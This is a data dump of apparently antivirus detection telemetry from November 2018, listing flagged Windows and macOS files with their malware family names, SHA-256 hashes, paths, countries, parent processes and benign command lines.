  Row(detection=Row(filename='msiexec.exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\msiexec.exe', filesize=320000, name='TR/Patched.Gen.#M300.#R6433'), hash='499eb2e6df63ae8f13e994e36f73f9979f3b781684ffb772f4987d5c01aa82de', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:47:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002219-376b7917', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002219-376B7917', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:22:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-062738-0e516bb4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b9bb611a\\AVSCAN-20181101-055500-1F89EAA1\\AVSCAN-20181101-062738-0E516BB4', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:30:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='356b76f0e3a923a292df62c83b15f59e1320bd33d8ee7759d0088d0c5fdec932', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:30:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-203430-8d725846', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_46807aa2\\AVSCAN-20181101-203301-8323FC51\\AVSCAN-20181101-203430-8D725846', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:33:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kometamini.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\t5f33221\\kometamini.exe', filesize=44668000, name='HEUR/AGEN.1025952.#M1.#R1'), hash='4a252ef5ee5064a7fe82cf05046bcc1c7dc5ea2e6b845b30644d9a6d85edf032', metadata=Row(cmdline='-r', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Endpoint Security for Windows\\avp.exe', parentsize=2206288, timestamp='2018-11-01T11:23:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T03:20:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-093057-e0c4e77e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9aa61a38\\AVSCAN-20181102-092506-AD362901\\AVSCAN-20181102-093057-E0C4E77E', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:56:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sttray.exe', filepath='\\?\\P:\\sysprepتعريفات أشرف تمام\\Drivers\\Audio\\Sigmatel(IDT)\\hd\\6138_hp\\sttray.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='5c97ee1f6676aaab6428c224c4bb733e16b321998a58ec965cb581c4bb958d65', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:12:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autoupdater.exe', filepath='C:\\MCoffline\\MCoffline\\programs\\Program Files\\loader\\Autoupdater.exe', filesize=2944000, name='W32/Neshta.A.#M1.#R1'), hash='7163430361a2a624a529c5014db1b9e654f43c4207850191223c8e6c885d2b9b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:As6N7dGP00Kwq6vB.1', country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-01T05:34:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vc_redist.x86.exe', filepath='C:\\ProgramData\\Package Cache\\{2e085fd2-a3e4-4b39-8e10-6b8d35f55244}\\VC_redist.x86.exe', filesize=580000, name='W32/Jeefo.A.#M1.#R1'), hash='a0d3d94a34a990441a66d26bdce8c3489703308a43461a7eebd42ba90b3956cd', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Lsj5Z1BTu0u5hzcw.1', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T17:37:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095302-61523156', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095302-61523156', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:53:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nssCD43.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-01T07:01:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsp8FD0.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-01T22:07:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\ixlatxi1udo\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1539843432.5bc825683a740', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AZ\\499287.exe', parentsize=671232, timestamp='2018-11-01T10:13:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d4401a19084ad558c5d1657c1c36fc5c1e5152af3e9bd2a9f0425207fb58849e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\D4401A19084AD558C5D1657C1C36FC5C1E5152AF3E9BD2A9F0425207FB58849E', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='d4401a19084ad558c5d1657c1c36fc5c1e5152af3e9bd2a9f0425207fb58849e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:00:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212116-d7b92131', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212116-D7B92131', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:21:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='modulo 6.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\INFORMATICA\\ECDL\\Moduli 1-7\\Modulo 6.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:24:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9f473f920a07ea0f4fd8ce689c8099deea64c073f47eed600454f636a8b1a740', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\9F473F920A07EA0F4FD8CE689C8099DEEA64C073F47EED600454F636A8B1A740', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9f473f920a07ea0f4fd8ce689c8099deea64c073f47eed600454f636a8b1a740', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:09:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pfnxftow.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\pFnxFTow.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093846-bd5f2c56', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093846-BD5F2C56', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:38:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2lgny2z0z50\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18630056, timestamp='2018-11-01T10:52:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-153855-1b4707bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a5d9c17\\AVSCAN-20181101-153508-ED4A8C8B\\AVSCAN-20181101-153855-1B4707BB', filesize=256000, name='TR/Tracur.A.6468.#M1.#R1'), hash='c4e98355b6cd5bb964f22c241bf470433b2385acde1c02395ba9cf73af5ef906', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T19:39:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='inputmapper.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\xD\\input mapper\\InputMapper.exe', filesize=2496000, name='W32/Neshta.A.#M1.#R1'), hash='e4d0a14e3e9510d05e51cbb92dd554b9fc1fee829b9cd0e883060b023d246706', metadata=Row(cmdline=None, country='SE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:37:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195532-ffcf18de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_472c3e3d\\AVSCAN-20181101-195507-FD0A90AC\\AVSCAN-20181101-195532-FFCF18DE', filesize=3492000, name='HEUR/AGEN.1004588.#M1.#R1'), hash='bd084bc735e1692e99aefe29ee21c6cb037567b2e127cd686704a05f341b42ab', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:56:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\ilchxgjadly\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:45:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='igdrcl32.dll', filepath='\\\\?\\C:\\Drivers\\Video\\Intel1\\HD1\\igdrcl32.dll', filesize=29632000, name='W32/Ramnit.CD.#M1.#R1'), hash='8b3047d92902ae2bfbf739fd19590f8762ee1deea944db21506d6520e3961d0a', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:35:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aapt.exe', filepath='K:\\TAB\\Lenovo_A5500HV\\Lenovo_A5500HV_A442_001_019_130808_ROW_(by_xdafirmware.com)\\Lenovo_A5500HV_A442_001_019_130808_ROW\\SN Write Tool v2.1444.00\\Android\\aapt.exe', filesize=2048000, name='W32/Sality.AT.#M1.#R1'), hash='e771100dd7a39bd9d1cf7baa0dc0fe9400dbf1e0e1c925b4a18f9e712ac0d361', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T09:33:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ahcremind.exe', filepath='C:\\Program Files\\Adobe\\Adobe Help Center\\ahcremind.exe', filesize=1536000, name='W32/Sality.AT.#M1.#R1'), hash='8f7f27476ea1e5821a30c00a349d26bf38ff5d65cfbaa1cf62eb2af0b5e34ec9', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Program Files\\\\\\\\HP\\\\\\\\HP Deskjet 1510 series\\\\\\\\bin\\\\\\\\HPStatusBL.dll\\\\\\",RunDLLEntry SERIALNUMBER=CN4C22P0BT05XJ;CONNECTION=USB;MONITOR=1;', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T07:14:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='installe.', filepath='CLICK_HE.APP/CONTENTS/MACOS/INSTALLE.', filesize=196000, name='Adware/OSX.Genieo.lvmpr.#M0.#R0'), hash='b3905883dd74ad5d2e92d9824b8110b0d06a0cf0fd18a36f8bf82ffa0a954a6e', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T23:29:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='de903792ea55afaa587429189f2dd3ea98c1c692b964acf881df5892e2769de4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\DE903792EA55AFAA587429189F2DD3EA98C1C692B964ACF881DF5892E2769DE4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='de903792ea55afaa587429189f2dd3ea98c1c692b964acf881df5892e2769de4', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:12:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\ikdpqneqawi\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540912029.5bd8739d3b7a5', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Emtak\\214531731.exe', parentsize=670720, timestamp='2018-11-01T04:21:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:13:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131833-38616118', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131833-38616118', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:18:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000192b3', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000192b3', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:09:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret.exe', filepath='C:\\Program Files\\Yamicsoft\\Windows 10 Manager\\keygen\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:KJcgLPOx5kqsvC5f.1', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T02:24:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-194932-b1f820b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8dc9ab8a\\AVSCAN-20181104-194845-AD465AF8\\AVSCAN-20181104-194932-B1F820B8', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:49:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131530-2a884856', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131530-2A884856', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:15:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215814-889a76ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-215814-889A76AC', filesize=64000, name='TR/Agent.wxqvk.#M1.#R1'), hash='3158f958bd97188137ab047ed4a4963579c6eb8cfb7d5bb9e4da03d817cb1f72', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:58:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-15-44-47.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T18:26:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-045259-089330f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-045101-EF83A9A5\\AVSCAN-20181104-045259-089330F2', filesize=388000, name='PUA/DownloadGuide.Gen.#M1.#R1'), hash='60e2bb799f71ee7f1b5eb7a803d411caf398f55bfa928cb3bf52ecbdc9d6cff3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T03:53:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='7e5c69fbaa6ec52e3826ad9979b886b85c9e2a4e4c57be16d522e30d82a90959', metadata=Row(cmdline='-k LocalServiceAndNoImpersonation', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T14:45:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001e740', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001e740', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:18:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vghd.exe', filepath='g:\\programms\\v-girl\\bin\\vghd.exe', filesize=3264000, name='W32/Ramnit.CD.#M1.#R1'), hash='1139f690ebabc8d11f3684e8d2fb02c67d09381d7312d55047d33e8292bf1c05', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:09:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T07:12:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0002443.exe', filepath='\\?\\G:\\System Volume Information\\_restore{EFCE7CAE-27B3-4426-B4E4-6C988E240358}\\RP1\\A0002443.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='2d16d3513da13bcd4ba34255d21841632003fe8221541afb2e28d99d58da6c7c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:19:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001ec78', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001ec78', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:19:34Z'), dt=datetime.date(2018, 11, 4)),
